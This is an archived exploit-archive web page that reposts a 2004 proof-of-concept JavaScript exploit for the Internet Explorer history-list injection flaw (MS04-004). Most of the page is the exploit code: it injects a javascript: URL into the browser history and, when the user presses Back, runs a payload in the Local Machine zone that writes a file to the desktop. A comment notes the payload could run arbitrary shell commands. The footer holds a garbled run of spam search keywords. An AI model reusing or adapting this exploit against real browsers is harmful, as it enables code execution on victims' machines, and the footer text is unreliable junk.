about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Internet Explorer url javascript injection in history list (MS04-004)



2004-02-04 Microsoft Internet Explorer url javascript injection in history list (MS04-004)
// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands. 
// This demo simply creates a harmless textfile on the desktop.
function payload() {
 file = "sandblad.txt";
 o = new ActiveXObject("ADODB.Stream");
 o.Open();
 o.Type=2;
 o.Charset="ascii";
 o.WriteText("You are vulnerable!");
 o.SaveToFile(file, 2);
 o.Close();
 alert("File "+file+" created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
 if (history.length != len)
 payload();
 else
 return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
 location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
 backbutton();
securitydot.net - 2004-02-04

Advertising

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 02:16:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Aper tamil sex welovetv.c paris ilth laten\\n lick offic Apache htt naked girl p...za/lap mambo Remo %2Fmodules search/exp bbs.77yoyo Freepronvi lo918l Tamil actr Sexartis WWW.WORLDS Apache: 2. soft welovetv.c WWW.INDIAN Scarlett J 9889102394 addguest.h taobaodx.c 52net.5d6d www.net-ri www.typobu www.21gz.c Indian wap www.sex.po www.mqdm.n 89.com fre ptptn lilian gar 1246+ php advanc Crack Data bur media.php? 82360.com xxx hindi grub www.taobao taobaodx.c sexcidiyo. 0756.teamb desknow //componen